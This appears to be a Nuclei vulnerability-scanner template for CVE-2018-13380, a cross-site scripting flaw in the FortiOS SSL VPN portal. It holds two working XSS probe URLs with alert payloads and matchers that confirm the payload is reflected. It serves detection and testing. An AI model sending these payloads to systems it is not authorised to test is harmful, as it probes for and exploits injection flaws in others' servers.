nuclei-templates/cves/2018/CVE-2018-13380.yaml

42 lines
1.3 KiB
YAML

id: CVE-2018-13380
info:
name: Fortinet FortiOS Cross-Site Scripting
author: shelld3v,AaronChen0
severity: medium
description: A Cross-site Scripting (XSS) vulnerability in Fortinet FortiOS 6.0.0 to 6.0.4, 5.6.0 to 5.6.7, 5.4.0 to 5.4.12, 5.2 and below versions under SSL VPN web portal allows attacker to execute unauthorized malicious script code via the error or message handling parameters.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2018-13380
- https://blog.orange.tw/2019/08/attacking-ssl-vpn-part-2-breaking-the-fortigate-ssl-vpn.html
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.10
cve-id: CVE-2018-13380
cwe-id: CWE-79
tags: cve,cve2018,fortios,xss,fortinet
requests:
- method: GET
path:
- "{{BaseURL}}/message?title=x&msg=%26%23%3Csvg/onload=alert(1337)%3E%3B"
- "{{BaseURL}}/remote/error?errmsg=ABABAB--%3E%3Cscript%3Ealert(1337)%3C/script%3E"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<svg/onload=alert(1337)>"
- "<script>alert(1337)</script>"
condition: or
- type: word
part: header
words:
- "application/json"
negative: true
- type: status
status:
- 200